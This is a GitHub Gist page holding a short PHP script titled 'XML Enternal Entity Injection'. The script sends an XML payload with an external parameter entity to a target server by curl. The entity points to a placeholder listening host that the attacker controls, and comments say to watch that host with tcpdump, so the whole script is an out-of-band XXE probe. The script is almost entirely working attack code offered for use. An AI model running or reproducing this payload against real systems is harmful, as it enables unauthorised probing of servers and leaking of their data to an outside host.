Last active
July 4, 2017 04:17
-
-
Save sh1n0b1/7d786397896354ecfae1 to your computer and use it in GitHub Desktop.
XML Enternal Entity Injection
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $xml_data ='<?xml version="1.0" encoding="UTF-8"?> | |
| <!DOCTYPE roottage [ | |
| <!ENTITY % dtd SYSTEM "http://<IP_ADDRESS>"> | |
| %dtd;]>'; | |
| //<!ENTITY xxe SYSTEM "http://target/">]> | |
| $URL = "https://target/"; | |
| $ch = curl_init($URL); | |
| curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: text/html')); | |
| curl_setopt($ch, CURLOPT_POST, 1); | |
| curl_setopt($ch, CURLOPT_POSTFIELDS, "$xml_data"); | |
| curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
| $output = curl_exec($ch); | |
| curl_close($ch) | |
| // Use tcpdump on the listening server | |
| //Replace <IP_ADDRESS> with your listening server | |
| //Replace target with the server you want to test | |
| ?> | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment